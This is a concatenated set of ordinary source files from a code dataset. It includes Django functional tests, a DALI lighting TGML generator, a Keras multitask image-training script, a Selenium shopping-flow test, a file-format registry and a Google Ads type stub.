self.refresh_thing()\n self.assertEqual(thing.name, \"New name\")\n self.assertEqual(thing.big, False)\n self.assertEqual(thing.clever, True)\n 
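# the select, radio, number and textarea fields should have been updated as well:\n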
self.assertEqual(thing.element_type, Thing.ELEMENT_AIR)\n self.assertEqual(thing.category, Thing.CATEGORY_QUASIGROUP)\n self.assertEqual(thing.count, 5)\n self.assertEqual(thing.description, \"Soft thing\\r\\nwith line breaks\")\n\n def test_fill_no_element_error(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(self.ElementNotFoundException, lambda: self.fill({'#id_blahblah': \"New name\"}))\n\n def test_fill_select_by_integer(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?select_for_category=1\"\n self.get_literal_url(url)\n self.fill_by_name({'name': \"New name\",\n 'big': False,\n 'clever': True,\n 'element_type': Thing.ELEMENT_AIR,\n 'category': Thing.CATEGORY_QUASIGROUP,\n 'count': 5,\n 'description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_submit(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('button[name=clear]')\n thing = self.refresh_thing()\n self.assertEqual(thing.name, \"\")\n\n def test_follow_link(self):\n self.get_url('list_things')\n self.follow_link('a.edit')\n self.assertUrlsEqual(reverse('edit_thing', kwargs={'thing_id': self.thing.id}))\n\n def test_follow_link_not_found(self):\n self.get_url('list_things')\n self.assertRaises(self.ElementNotFoundException, lambda: self.follow_link('a.foobar'))\n\n def test_back(self):\n self.get_url('list_things')\n self.follow_link('a.edit')\n self.back()\n self.assertUrlsEqual(reverse('list_things'))\n\n def test_multiple_back(self):\n # We could test the behaviour regarding forms, especially those that\n # submit to the same URL and then redirect to the same URL. However,\n # Firefox and Chrome behave differently here - Firefox produces\n # fewer history entries.\n self.get_url('list_things')\n self.follow_link('a.edit')\n edit_url = reverse('edit_thing', kwargs={'thing_id': self.thing.id})\n self.assertUrlsEqual(edit_url)\n self.submit('button[name=clear]')\n self.assertUrlsEqual(reverse('thing_cleared', kwargs={'thing_id': self.thing.id}))\n self.assertTextPresent(\"was cleared\")\n self.back()\n self.assertUrlsEqual(edit_url)\n self.back()\n self.assertUrlsEqual(reverse('list_things'))\n\n def test_set_session_data(self):\n self.set_session_data({'name': 'The Jabberwocky'})\n self.get_url('django_functest.test_misc')\n self.assertTextPresent(\"Hello to The Jabberwocky\")\n\n def test_get_session_data(self):\n self.get_url('django_functest.set_sess_foo_to_bar')\n sess_dict = self.get_session_data()\n self.assertEqual(sess_dict, {'foo': 'bar'})\n\n def test_value(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertEqual(self.value('#id_name'),\n \"Rock\")\n self.assertEqual(self.value('#id_big'),\n True)\n self.assertEqual(self.value('#id_clever'),\n False)\n self.assertEqual(self.value('#id_element_type'),\n 'e')\n self.assertEqual(self.value('[name=category]'),\n str(Thing.CATEGORY_MAGMA))\n self.assertEqual(self.value('#id_description'),\n 'Hard thing')\n\n def test_value_immediately_after_fill(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.fill_by_name({\n 'name': \"Some changed name\",\n 'big': False,\n 'clever': True,\n 'element_type': 'w',\n 'category': Thing.CATEGORY_MONOID,\n 'description': \"Some changed description\",\n })\n self.assertEqual(self.value('#id_name'),\n \"Some changed name\")\n self.assertEqual(self.value('#id_big'),\n False)\n self.assertEqual(self.value('#id_clever'),\n True)\n 
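# the just-filled values should be readable back immediately, before any submit:\n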
self.assertEqual(self.value('#id_element_type'),\n 'w')\n self.assertEqual(self.value('#id_description'),\n \"Some changed description\")\n self.assertEqual(self.value('[name=category]'),\n str(Thing.CATEGORY_MONOID))\n\n def test_file_upload(self):\n self.get_url('edit_thing_with_upload', thing_id=self.thing.id)\n data = b\"This is my data\"\n self.fill({'#id_notes_file': Upload(\"notes.txt\", content=data)})\n self.submit('[name=change]')\n thing = self.refresh_thing()\n self.assertEqual(thing.notes_file.file.read(), data)\n\n def test_new_browser_session(self):\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Hello new user')\n self.assertTextAbsent('Welcome back')\n uid_1 = self.get_session_data()['UID']\n\n # Sanity check our view behaves as expected\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n uid_1b = self.get_session_data()['UID']\n\n self.assertEqual(uid_1, uid_1b)\n\n first_session_token, second_session_token = self.new_browser_session()\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Hello new user')\n self.assertTextAbsent('Welcome back')\n uid_2 = self.get_session_data()['UID']\n self.assertNotEqual(uid_1, uid_2)\n\n # Tests for switch_browser_session\n ot2, nt2 = self.switch_browser_session(first_session_token)\n self.assertEqual(nt2, first_session_token)\n self.assertEqual(ot2, second_session_token)\n\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n self.assertTextPresent(uid_1)\n self.assertEqual(self.get_session_data()['UID'], uid_1)\n\n self.switch_browser_session(second_session_token)\n self.get_url('new_browser_session_test')\n self.assertTextPresent('Welcome back')\n self.assertTextPresent(uid_2)\n self.assertEqual(self.get_session_data()['UID'], uid_2)\n\n # assertTextPresent (etc.) should work without refetching\n # a page. 
This requires things like `last_response`\n # automatically switching.\n\n self.switch_browser_session(first_session_token)\n self.assertTextPresent(uid_1)\n self.assertTextAbsent(uid_2)\n self.switch_browser_session(second_session_token)\n self.assertTextPresent(uid_2)\n self.assertTextAbsent(uid_1)\n\n\nclass TestFuncWebTestCommon(TestCommonBase, WebTestBase):\n\n ElementNotFoundException = WebTestNoSuchElementException\n TextNotFoundException = ValueError\n ElementUnusableException = WebTestCantUseElement\n\n def test_is_full_browser_attribute(self):\n self.assertEqual(self.is_full_browser_test, False)\n\n def test_fill_multiple_matches(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestMultipleElementsException, lambda: self.fill({'input[type=checkbox]': True}))\n\n def test_fill_element_without_name(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestCantUseElement, lambda: self.fill({'#id_badinput1': \"Hello\"}))\n\n def test_fill_element_outside_form(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.assertRaises(WebTestCantUseElement, lambda: self.fill({'#id_badinput2': \"Hello\"}))\n\n def test_submit_no_auto_follow(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('input[name=change]', auto_follow=False)\n self.assertEqual(self.last_response.status_int, 302)\n\n def test_follow_link_multiple_matches(self):\n Thing.objects.create(name=\"Another\")\n self.get_url('list_things')\n self.assertRaises(WebTestMultipleElementsException, lambda: self.follow_link('a.edit'))\n\n def test_follow_link_no_href(self):\n self.get_url('list_things')\n self.assertRaises(WebTestCantUseElement, lambda: self.follow_link('a.javascriptonly'))\n\n def test_get_literal_url_auto_follow(self):\n url = '/admin/login' # No trailing '/'\n self.get_literal_url(url, auto_follow=True)\n self.assertUrlsEqual(url + '/')\n\n self.get_literal_url(url, auto_follow=False)\n self.assertUrlsEqual(url)\n self.assertEqual(self.last_response.status_int, 301)\n\n def test_get_literal_url_expect_errors(self):\n url = '/a_404_url/'\n self.get_literal_url(url, expect_errors=True)\n self.assertEqual(self.last_response.status_int, 404)\n self.assertRaises(Exception, lambda: self.get_literal_url(url, expect_errors=False))\n\n\nclass TestFuncSeleniumCommonBase(TestCommonBase):\n\n ElementNotFoundException = TimeoutException\n TextNotFoundException = NoSuchElementException\n ElementUnusableException = SeleniumCantUseElement\n\n def test_is_full_browser_attribute(self):\n self.assertEqual(self.is_full_browser_test, True)\n\n def test_fill_with_scrolling(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?add_spacers=1\"\n self.get_literal_url(url)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n def test_submit_no_wait_for_reload(self):\n self.get_url('edit_thing', thing_id=self.thing.id)\n self.submit('button[name=check]', wait_for_reload=False)\n self.assertTextPresent(\"Everything is fine\")\n\n def test_submit_slow_page(self):\n url = reverse('edit_thing', kwargs=dict(thing_id=self.thing.id)) + \"?add_js_delay=5\"\n self.get_literal_url(url)\n self.fill({'#id_name': \"New name\",\n '#id_big': False,\n '#id_clever': True,\n 
'#id_category_1': Thing.CATEGORY_QUASIGROUP,\n '#id_element_type': Thing.ELEMENT_AIR,\n '#id_count': 5,\n '#id_description': \"Soft thing\\r\\nwith line breaks\",\n })\n self.submit('input[name=change]')\n self._assertThingChanged()\n\n\nclass TestFuncSeleniumCommonFirefox(TestFuncSeleniumCommonBase, FirefoxBase):\n pass\n\n\nclass TestFuncSeleniumCommonChrome(TestFuncSeleniumCommonBase, ChromeBase):\n pass\n\n\nclass TestFuncSeleniumCommonPhantomJS(TestFuncSeleniumCommonBase, PhantomJSBase):\n pass\n","sub_path":"django_functest/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":18403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"443017073","text":"#!/usr/bin/env python\n\"\"\"\nAutomatically adds a number of luminaire symbols per zone of a controller.\nUsage:\n python gen_dali.py\n\n\"\"\"\nimport os\nimport sys\nfrom collections import defaultdict\n\ndef read_dali_file(filename):\n # Build a dictionary holding, for each DALI module, a list of LUL names and DALI addresses read from a file.\n d = defaultdict(list)\n try:\n with open(filename, 'r') as f:\n for line in f:\n l = line.rstrip()\n if l.startswith('#'):\n continue\n\n if \"DALI\" in l:\n key = l\n else:\n s = l.split();\n if len(s) > 1:\n if len(s) == 4:\n d[key].append((s[1], (s[0], s[2], s[3])))\n elif len(s) == 3:\n d[key].append((s[1], (s[0], s[2])))\n else:\n d[key].append((s[1], s[0]))\n else:\n if len(s)>=1:\n print(\"WARN: Not used \"+l)\n\n except OSError as err:\n print('ERROR: cannot open file {}_DALI.txt'.format(filename))\n\n return d\n\ndef get_dali_bus(d, bus):\n l = d['DALI{}'.format(bus)]; # The list for the DALI module\n\n # Check whether an address is already set; if so, just print a message.\n x = 0\n for i in l:\n if x & (1 << int(i[0])):\n print('Address {} already used'.format(i[0]))\n else:\n x |= (1 << int(i[0]))\n\n return dict(l)\n\n\n\"\"\"\nluls: dictionary whose keys are the DALI addresses of the luminaires and whose values are tuples of the luminaire name and, optionally, the group the luminaire belongs to.\ntop: top position of the first symbol\nleft: left position of the first symbol\n\"\"\"\ndef add_symbols(fw, luls, top, left):\n height = 13\n width = 34\n\n for lul in luls.values():\n if type(lul) is not tuple:\n # Skip names without an assigned DALI address.\n continue\n\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write(' \\n')\n fw.write('\\n')\n\n top = top + height + 10\n if top > 700:\n top = 10\n left = left + width + 10\n\n return top, left\n\n\n\"\"\"\nbasename: the base of the input/output filenames.\nbus: the DALI bus number.\n\"\"\"\ndef generate_tgml(basename, bus):\n # Read the DALI file and copy its data into a dictionary.\n d = read_dali_file('{}_DALI.txt'.format(basename))\n if len(d) == 0:\n print('No valid data found in file {}_DALI.txt'.format(basename))\n exit(0)\n\n # Get a dictionary for the given bus.\n b = get_dali_bus(d, bus)\n if len(b) == 0:\n print('No data for bus {} found in file {}_DALI.txt'.format(bus, basename))\n exit(0)\n\n # Create the destination file.\n try:\n fw = open('{}_BUS{}.tgml'.format(basename, bus), \"w\")\n except IOError as e:\n print(\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n exit()\n except: #handle other exceptions such as attribute errors\n print(\"Unexpected error:\",
sys.exc_info()[0])\n exit()\n\n # Write data to file.\n fw.write('\\n')\n fw.write('\\n')\n fw.write(' \\n')\n\n add_symbols(fw, b, 10, 10)\n\n fw.write(' \\n')\n fw.write('\\n')\n fw.close()\n\n\"\"\"\n\"\"\"\ndef main():\n\n # S1\n #generate_tgml('+002_S1_S02.30_111=TDS32_01', 1)\n\n # 00\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 1)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 2)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 3)\n #generate_tgml('+002_00_G05.30_002=TDS32_01', 4)\n\n #generate_tgml('+002_00_023.30_114=TDS32_01', 1)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 2)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 3)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 4)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 5)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 7)\n #generate_tgml('+002_00_023.30_114=TDS32_01', 8)\n\n #generate_tgml('+002_00_004.30_001=TDS32_01', 1)\n #generate_tgml('+002_00_004.30_001=TDS32_01', 2)\n #generate_tgml('+002_00_004.30_001=TDS32_01', 3)\n\n generate_tgml('+002_00_014.30_003=TDS32_01', 1)\n generate_tgml('+002_00_014.30_003=TDS32_01', 2)\n generate_tgml('+002_00_014.30_003=TDS32_01', 3)\n\n # 01\n #generate_tgml('+002_01_021.30_004=TDS32_01', 1)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 2)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 3)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 4)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 5)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 6)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 7)\n #generate_tgml('+002_01_021.30_004=TDS32_01', 8)\n\n #generate_tgml('+002_01_G15.30_013=TDS32_01', 1)\n #generate_tgml('+002_01_G15.30_013=TDS32_01', 2)\n\n #generate_tgml('+002_01_G22.30_012=TDS32_01', 1)\n\n # 02\n #generate_tgml('+002_02_021.30_004=TDS32_01', 6)\n #generate_tgml('+002_02_021.30_004=TDS32_01', 7)\n\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 2)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 3)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 4)\n #generate_tgml('+002_02_G21.30_001=TDS32_01', 5)\n\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 1)\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 2)\n #generate_tgml('+002_02_G15.30_023=TDS32_01', 3)\n\n #generate_tgml('+002_02_G22.30_022=TDS32_01', 1)\n #generate_tgml('+002_02_G22.30_022=TDS32_01', 2)\n\n # 03\n #generate_tgml('+002_03_040.30_030=TDS32_01', 7)\n #generate_tgml('+002_03_040.30_030=TDS32_01', 8)\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cicg2/gen_dali.py","file_name":"gen_dali.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362139688","text":"import os, h5py\nimport scipy.io as mat_load\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nimport numpy.random as rng\nfrom keras.models import Sequential, Model, model_from_json, load_model\nfrom keras.layers import Dense, Dropout, Input, Lambda\nfrom keras import optimizers\nfrom keras import backend as K\nfrom keras.layers import Conv2D, MaxPooling2D,concatenate\nfrom keras.layers import Activation, Dropout, Flatten, Dense,Input\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications import vgg16, vgg19,inception_v3\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\n\n# TODO: check 
on the size of input images MOON paper\nimg_width, img_height, depth = 224,224,3\nimg_input = Input(shape=(img_height,img_width,depth))\nnb_train_samples = 297803\n#nb_train_samples = 1000\nnb_validation_samples = 4500\n#nb_validation_samples = 1200\nnb_epoch = 50\nbatch_size = 64\n\n#Step 1: Train generator\ndef train_generator():\n #full_image_dir = 'keras_data/full_image/train'\n img_dir = '../data_affect/train_aug'\n label_file = mat_load.loadmat('da_train_aug_labels_5000')\n label_data = label_file['train_aug_labels']\n #landmark_data = label_file['landmark_labels']\n train_batch_size = batch_size\n image_id = 1\n train_index_thr = batch_size * int(nb_train_samples/batch_size)\n\n while True:\n batch_labels = []\n batch_landmark_labels = []\n batch_feature = []\n image_count = 0\n\n if((image_id+batch_size) > train_index_thr):\n image_id = 1\n\n\n while(image_count < batch_size and image_id < nb_train_samples):\n try:\n if image_id <= 42553:\n str_format = '.jpg'\n else:\n str_format = '.jpeg'\n\n filename = img_dir + '/image' + str(image_id).zfill(7) + str_format\n body_img = image.load_img(filename, target_size=(img_height,img_width))\n x = image.img_to_array(body_img)\n x = np.expand_dims(x, axis=0)\n feature01 = preprocess_input(x)\n img_label = label_data[image_id-1][0]\n\n landmark_label = label_data[image_id-1][1:]\n batch_feature += [feature01]\n batch_labels += [img_label]\n batch_landmark_labels += [landmark_label]\n image_count = image_count + 1\n image_id = image_id + 1\n except IOError:\n image_id = image_id + 1\n continue\n\n batch_labels = to_categorical(batch_labels,9)\n batch_labels = np.array(batch_labels)\n batch_landmark_labels = np.array(batch_landmark_labels)\n batch_feature = np.array(batch_feature)\n batch_feature = np.squeeze(batch_feature)\n\n yield (batch_feature,[batch_labels,batch_landmark_labels])\n\n\ndef val_generator():\n #full_image_dir = 'keras_data/full_image/train'\n img_dir = '../data_affect/val'\n label_file = mat_load.loadmat('landmark_val_labels')\n label_data = label_file['val_label']\n #landmark_data = label_file['landmark_labels']\n train_batch_size = batch_size\n image_id = 1\n train_index_thr = batch_size * int(nb_validation_samples/batch_size)\n\n while True:\n batch_labels = []\n batch_landmark_labels = []\n batch_feature = []\n image_count = 0\n\n if((image_id+batch_size) > train_index_thr):\n image_id = 1\n\n while(image_count < batch_size and image_id < nb_validation_samples):\n try:\n filename = img_dir + '/image' + str(image_id).zfill(7) + '.jpg'\n body_img = image.load_img(filename, target_size=(img_height,img_width))\n x = image.img_to_array(body_img)\n x = np.expand_dims(x, axis=0)\n feature01 = preprocess_input(x)\n\n img_label = label_data[image_id-1][0]\n landmark_label = label_data[image_id-1][1:]\n batch_feature += [feature01]\n batch_labels += [img_label]\n batch_landmark_labels += [landmark_label]\n image_count = image_count + 1\n image_id = image_id + 1\n except IOError:\n image_id = image_id + 1\n\n continue\n\n batch_labels = to_categorical(batch_labels,9)\n batch_labels = np.array(batch_labels)\n batch_landmark_labels = np.array(batch_landmark_labels)\n batch_feature = np.array(batch_feature)\n batch_feature = np.squeeze(batch_feature)\n\n yield (batch_feature,[batch_labels,batch_landmark_labels])\n\n\n# Set-up the architecture\nWEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n#weights_path = 
'keras_weights/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n# Block 1\nx = Conv2D(64, (3, 3), data_format='channels_last',padding = 'same', activation= 'relu',name='block1_conv1')(img_input)\nx = Conv2D(64, (3, 3), activation= 'relu', padding='same', name='block1_conv2')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n# Block 2\nx = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)\nx = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n# Block 3\nx = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)\nx = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)\nx = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n# Block 4\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n# Block 5\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)\n\nvgg16_model = Model(img_input,x)\nweights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',\n WEIGHTS_PATH_NO_TOP,\n cache_subdir='models')\nvgg16_model.load_weights(weights_path)\n\nfor layers in vgg16_model.layers:\n layers.trainable = False\n\ndata_shape = vgg16_model.output_shape[1:]\noutput_from_vgg16_model = Input(shape = (data_shape))\n\nx = Flatten(name='flatten')(output_from_vgg16_model)\nx = Dense(1024, activation='relu', name='t1_fc3')(x)\n#x = Dropout(0.6)(x)\nx = Dense(512, activation='relu', name='t1_fc1')(x)\nx = Dropout(0.6)(x)\nx = Dense(256, activation='relu', name='t1_fc2')(x)\nx = Dropout(0.6)(x)\npredictions = Dense(9, activation='softmax', name='predictions')(x)\n\ndiscrete_top_model = Model(inputs = output_from_vgg16_model, outputs = predictions)\n\nx = Flatten(name='flatten')(output_from_vgg16_model)\n#x = Dense(1024, activation='relu', name='fc3')(x)\nx = Dense(512, activation='relu', name='t2_fc1')(x)\nx = Dropout(0.6)(x)\nx = Dense(128, activation='relu', name='t2_fc2')(x)\nx = Dropout(0.6)(x)\ncontinuous_prediction = Dense(2, activation='tanh', name='continuous_prediction')(x)\n\nconinuous_top_model = Model(inputs = output_from_vgg16_model, outputs = continuous_prediction)\n\nfinal_model = Model(inputs = vgg16_model.input,outputs = [discrete_top_model(vgg16_model.output),coninuous_top_model(vgg16_model.output)])\n\n# TODO Step 3: compiling and training\noptimizer_adam = optimizers.Adam(lr = 0.0001)\noptimizer_rmsprop = optimizers.RMSprop(lr=0.00001)\nfinal_model.compile(loss = ['categorical_crossentropy','mean_squared_error'], \\\n optimizer = optimizer_adam, metrics=['accuracy'])\n\n\n# checkpoint\noutputFolder = './output-affect'\nif not os.path.exists(outputFolder):\n os.makedirs(outputFolder)\nfilepath=outputFolder+\"/weights_c_t1024_t512_t256-{epoch:03d}-{val_loss:.2f}.hdf5\"\ncheckpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, \\\n save_best_only=False, 
save_weights_only=True, \\\n mode='auto', period=1)\ncallbacks_list = [checkpoint]\n\nn_steps_per_epoch = nb_train_samples/batch_size\nn_val_steps = nb_validation_samples/batch_size\nfinal_model.fit_generator(generator=train_generator(),steps_per_epoch=n_steps_per_epoch,callbacks=callbacks_list, \\\n epochs=nb_epoch,validation_data = val_generator(),validation_steps=n_val_steps, \\\n initial_epoch=0)\nfinal_model.save_weights('mulitask01_e50_t1024_512_256.h5')\n\nfinal_model_json = final_model.to_json()\nwith open(\"vgg16_top_layer_1024_512_256_json.json\", \"w\") as json_file:\n json_file.write(final_model_json)\n","sub_path":"multitask02.py","file_name":"multitask02.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164933632","text":"import time\nimport pytest\nfrom Utilities.Baseclass import Baseclass\nfrom Testdata.getdata import senddata\n\n\nclass Testflipkart(Baseclass):\n def test_flipkarFlow(self, getdata):\n self.driver.find_element_by_xpath(\"//button[@class='_2KpZ6l _2doB4z']\").click()\n self.driver.find_element_by_css_selector(\"._3704LK\").send_keys(\"Mens watch\")\n self.driver.find_element_by_xpath(\"//button[@class='L0Z3Pu']\").click()\n\n list = []\n time.sleep(3)\n\n# Select the sort option and choose price low to high\n sortdata = self.driver.find_elements_by_xpath(\"//div[@class='_5THWM1']/div\")\n print(len(sortdata))\n for sort in sortdata:\n if sort.text == getdata[\"sortby\"]:\n sort.click()\n break\n\n time.sleep(5)\n self.driver.find_element_by_xpath(\"//div[@class='QvtND5 _2w_U27']\").click()\n self.driver.find_element_by_xpath(\"//input[@placeholder='Search Brand']\").send_keys(getdata[\"searchbrand\"])\n\n# Pick all the brands and select a particular brand\n Brands = self.driver.find_elements_by_xpath(\"//div[@class='_38vbm7']/div\")\n print(len(Brands))\n for brand in Brands:\n if brand.text == getdata[\"Selectbrand\"]:\n brand.click()\n break\n self.driver.find_element_by_xpath(\"//span[contains(text(),'Apply Filters')]\").click()\n time.sleep(3)\n\n# Add the prices to the list and pick the lowest price\n prices = self.driver.find_elements_by_xpath(\"//div/div[@class='_30jeq3']\")\n print(len(prices))\n time.sleep(3)\n for price in prices:\n list.append(price.text)\n j = list[0]\n for p in range(len(list)):\n if list[p] < j:\n j = list[p]\n\n print(list)\n print(j)\n time.sleep(5)\n# Compare the prices with the lowest price found in the loop above and click on the lowest one\n for low in prices:\n if low.text == j:\n low.click()\n\n time.sleep(3)\n# Move to the new tab and click the add to cart button\n self.driver.switch_to.window(self.driver.window_handles[1])\n self.driver.find_element_by_xpath(\"//button[@class='_2KpZ6l _2U9uOA _3v1-ww']\").click()\n self.driver.find_element_by_xpath(\"//span[text()='Place Order']\").click()\n\n\n\n\n\n# Use data with fixture and return the value and get the values with data[index]\n# @pytest.fixture()\n# def data():\n# return [\"Price -- Low to High\", \"Fast\", \"Fastrack\"]\n\n# Use data with fixture and return the value and get the values with data[keyvalue] with parameter\n# @pytest.fixture(params=[{\"sortby\":\"Price -- Low to High\", \"searchbrand\":\"Fast\", \"Selectbrand\":\"Fastrack\"}])\n# def data(request):\n# return request.param\n\n# Get the data from the test data file and use it in this file\n@pytest.fixture(params = senddata.test_data)\ndef getdata(request):\n return
request.param","sub_path":"tests/test_flipcartTest.py","file_name":"test_flipcartTest.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53337178","text":"import importlib\nimport inspect\nimport logging\n\nfrom . import example_filetype_format\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nBASE_CLASS = example_filetype_format.FileTypeFormat\n\ndef collect_format_types(package_names):\n \"\"\"Find subclasses of the example_filetype_format.FileTypeFormat from a list of package names.\n\n Args:\n package_names: A list of Python package names as strings.\n Returns:\n A list of classes that are in the named packages and subclasses of example_filetype_format.FileTypeFormat.\n \"\"\"\n\n file_format_list = []\n for package_name in package_names:\n importlib.import_module(package_name)\n\n for cls in get_subclasses(example_filetype_format.FileTypeFormat):\n logger.debug(\"checking {cls}.\".format(cls=cls))\n cls_module_name = cls.__module__\n cls_pkg = cls_module_name.split('.')[0]\n if cls_pkg in package_names:\n file_format_list.append(cls)\n file_format_dict = make_format_registry_dict(file_format_list)\n return file_format_dict\n\ndef make_format_registry_dict(cls_list):\n \"\"\"Use an object's _fileType attribute to make a class lookup dictionary.\n \n Args:\n cls_list: A list of Python classes.\n Returns:\n A dictionary mapping the class._fileType to the class.\n \"\"\"\n\n return {cls._fileType: cls for cls in cls_list}\n\ndef get_subclasses(cls):\n for subclass in cls.__subclasses__():\n yield from get_subclasses(subclass)\n yield subclass\n\nPROCESS_FILES_LIST = [x for x in get_subclasses(BASE_CLASS)]\n\nPROCESS_FILES = make_format_registry_dict(cls_list=PROCESS_FILES_LIST)\n","sub_path":"genie/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393083491","text":"from collections.abc import MutableSequence\nfrom typing import Any\n\nimport proto\n\nfrom google.ads.googleads.v12.enums.types.gender_type import GenderTypeEnum\nfrom google.ads.googleads.v12.enums.types.income_range_type import IncomeRangeTypeEnum\nfrom google.ads.googleads.v12.enums.types.parental_status_type import (\n ParentalStatusTypeEnum,\n)\n\nclass AgeDimension(proto.Message):\n age_ranges: MutableSequence[AgeSegment]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n age_ranges: MutableSequence[AgeSegment] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass AgeSegment(proto.Message):\n min_age: int\n max_age: int\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n min_age: int = ...,\n max_age: int = ...\n ) -> None: ...\n\nclass AudienceDimension(proto.Message):\n age: AgeDimension\n gender: GenderDimension\n household_income: HouseholdIncomeDimension\n parental_status: ParentalStatusDimension\n audience_segments: AudienceSegmentDimension\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n age: AgeDimension = ...,\n gender: GenderDimension = ...,\n household_income: HouseholdIncomeDimension = ...,\n parental_status: ParentalStatusDimension = ...,\n audience_segments: AudienceSegmentDimension = ...\n ) -> None: ...\n\nclass 
